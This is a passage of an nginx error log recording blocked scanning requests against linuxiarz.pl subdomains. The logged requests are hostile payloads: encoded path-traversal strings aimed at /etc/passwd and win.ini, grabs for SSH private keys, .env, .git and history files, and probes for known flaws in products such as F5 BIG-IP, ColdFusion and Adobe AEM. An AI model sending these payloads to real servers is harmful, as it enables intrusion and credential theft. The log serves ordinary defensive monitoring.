forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:54:00 [error] 1236#1236: *437957 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:54:09 [error] 1236#1236: *437978 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:54:19 [error] 1236#1236: *437995 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:54:22 [error] 1236#1236: *438011 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:54:23 [error] 1236#1236: *438016 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:54:41 [error] 1236#1236: *438066 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:54:42 [error] 1236#1236: *438069 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:54:45 [error] 1236#1236: *438078 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:54:46 [error] 1236#1236: *438085 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:54:47 [error] 1236#1236: *438089 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:54:47 [error] 1236#1236: *438090 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:55:03 [error] 1236#1236: *438133 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:55:04 [error] 1236#1236: *438134 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/21 02:30:24 [error] 1236#1236: *495342 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/06/22 22:03:17 [error] 1236#1236: *657055 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "https://kodi.linuxiarz.pl:443" +2025/06/22 22:11:57 [error] 1236#1236: *657627 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "https://kodi.linuxiarz.pl:443" +2025/06/22 22:25:06 [error] 1236#1236: *658416 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:29:37 [error] 1236#1236: *658732 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:40 [error] 1236#1236: *658860 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:40 [error] 1236#1236: *658861 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:40 [error] 1236#1236: *658862 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:41 [error] 1236#1236: *658863 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:41 [error] 1236#1236: *658864 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:41 [error] 1236#1236: *658866 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:41 [error] 1236#1236: *658867 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:41 [error] 1236#1236: *658868 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:42 [error] 1236#1236: *658870 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:42 [error] 1236#1236: *658871 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:42 [error] 1236#1236: *658872 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:43 [error] 1236#1236: *658873 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:43 [error] 1236#1236: *658874 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:43 [error] 1236#1236: *658876 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:43 [error] 1236#1236: *658877 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:43 [error] 1236#1236: *658878 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:44 [error] 1236#1236: *658879 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:44 [error] 1236#1236: *658880 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:31:44 [error] 1236#1236: *658882 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:33:14 [error] 1236#1236: *658940 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:35:31 [error] 1236#1236: *659085 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:35:48 [error] 1236#1236: *659107 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:36:47 [error] 1236#1236: *659180 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:42:03 [error] 1236#1236: *659532 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:42:03 [error] 1236#1236: *659533 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_dsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:42:03 [error] 1236#1236: *659534 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_1024 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:42:04 [error] 1236#1236: *659535 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_2048 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:42:04 [error] 1236#1236: *659536 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_3072 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:42:04 [error] 1236#1236: *659537 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_4096 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:42:04 [error] 1236#1236: *659538 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_ed25519 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:46:08 [error] 1236#1236: *659722 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.remote-sync.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:46:36 [error] 1236#1236: *659767 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:47:20 [error] 1236#1236: *659799 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:48:10 [error] 1236#1236: *659841 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:48:39 [error] 1236#1236: *659864 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.esmtprc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:49:49 [error] 1236#1236: *659913 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:13 [error] 1236#1236: *660080 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:21 [error] 1236#1236: *660085 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:23 [error] 1236#1236: *660093 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:24 [error] 1236#1236: *660094 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:24 [error] 1236#1236: *660095 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:24 [error] 1236#1236: *660096 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:24 [error] 1236#1236: *660097 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:25 [error] 1236#1236: *660098 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:25 [error] 1236#1236: *660099 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:25 [error] 1236#1236: *660100 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:25 [error] 1236#1236: *660101 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:25 [error] 1236#1236: *660102 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:26 [error] 1236#1236: *660103 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:26 [error] 1236#1236: *660104 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:26 [error] 1236#1236: *660105 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:26 [error] 1236#1236: *660106 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:27 [error] 1236#1236: *660107 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:27 [error] 1236#1236: *660108 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:30 [error] 1236#1236: *660111 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:30 [error] 1236#1236: *660112 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:30 [error] 1236#1236: *660113 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:31 [error] 1236#1236: *660114 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.kodi HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:53:49 [error] 1236#1236: *660122 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:54:11 [error] 1236#1236: *660129 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:54:12 [error] 1236#1236: *660131 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:54:12 [error] 1236#1236: *660132 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:54:12 [error] 1236#1236: *660133 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:54:13 [error] 1236#1236: *660134 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:54:16 [error] 1236#1236: *660153 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:57:19 [error] 1236#1236: *660307 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.config/sftp.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:58:03 [error] 1236#1236: *660339 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 22:58:09 [error] 1236#1236: *660346 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:02:26 [error] 1236#1236: *660540 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:04:10 [error] 1236#1236: *660668 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "kodi.linuxiarz.pl:443" +2025/06/22 23:04:20 [error] 1236#1236: *660676 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "kodi.linuxiarz.pl:443" +2025/06/22 23:11:24 [error] 1236#1236: *661075 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:11:50 [error] 1236#1236: *661095 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:13:22 [error] 1236#1236: *661166 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:15:02 [error] 1236#1236: *661235 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:20:50 [error] 1236#1236: *661598 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:22:32 [error] 1236#1236: *662324 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:23:30 [error] 1236#1236: *662826 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:26:17 [error] 1236#1236: *664073 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:27:14 [error] 1236#1236: *664442 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "https://kodi.linuxiarz.pl:443" +2025/06/22 23:27:39 [error] 1236#1236: *664641 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:28:41 [error] 1236#1236: *665046 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:37:01 [error] 1236#1236: *666532 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.badarg.log HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:48:18 [error] 1236#1236: *667227 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.example.com HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:49:43 [error] 1236#1236: *667314 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:50:28 [error] 1236#1236: *667351 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:50:36 [error] 1236#1236: *667355 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:51:26 [error] 1236#1236: *667423 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:52:16 [error] 1236#1236: *667464 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/22 23:52:48 [error] 1236#1236: *667494 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mysql_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/29 17:49:49 [error] 313972#313972: *242663 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/06/30 02:27:24 [error] 313971#313971: *268617 access forbidden by rule, client: 34.81.209.35, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/30 18:31:01 [error] 313971#313971: *301840 access forbidden by rule, client: 34.148.153.16, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/03 19:09:24 [error] 313971#313971: *463720 access forbidden by rule, client: 34.162.94.5, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/03 19:09:24 [error] 313971#313971: *463720 access forbidden by rule, client: 34.162.94.5, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/03 19:17:23 [error] 313971#313971: *464068 access forbidden by rule, client: 34.162.39.0, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/03 19:17:23 [error] 313971#313971: *464068 access forbidden by rule, client: 34.162.39.0, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/04 01:51:48 [error] 313972#313972: *485038 access forbidden by rule, client: 34.162.170.91, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/04 01:51:48 [error] 313972#313972: *485038 access forbidden by rule, client: 34.162.170.91, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/05 11:12:58 [error] 81058#81058: *36211 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/07/08 19:29:40 [error] 1578488#1578488: *357837 access forbidden by rule, client: 18.156.129.188, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/07/09 07:16:33 [error] 1578488#1578488: *408600 access forbidden by rule, client: 195.178.110.161, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/09 07:16:33 [error] 1578488#1578488: *408601 access forbidden by rule, client: 195.178.110.161, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/09 07:16:33 [error] 1578488#1578488: *408602 access forbidden by rule, client: 195.178.110.161, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/09 07:16:34 [error] 1578488#1578488: *408603 access forbidden by rule, client: 195.178.110.161, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/09 07:16:34 [error] 1578488#1578488: *408604 access forbidden by rule, client: 195.178.110.161, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/09 07:16:34 [error] 1578488#1578488: *408605 access forbidden by rule, client: 195.178.110.161, server: nginx.linuxiarz.pl, request: "GET /application/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/09 07:16:35 [error] 1578488#1578488: *408611 access forbidden by rule, client: 195.178.110.161, server: nginx.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/09 07:16:36 [error] 1578488#1578488: *408612 access forbidden by rule, client: 195.178.110.161, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/09 07:16:36 [error] 1578488#1578488: *408613 access forbidden by rule, client: 195.178.110.161, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" 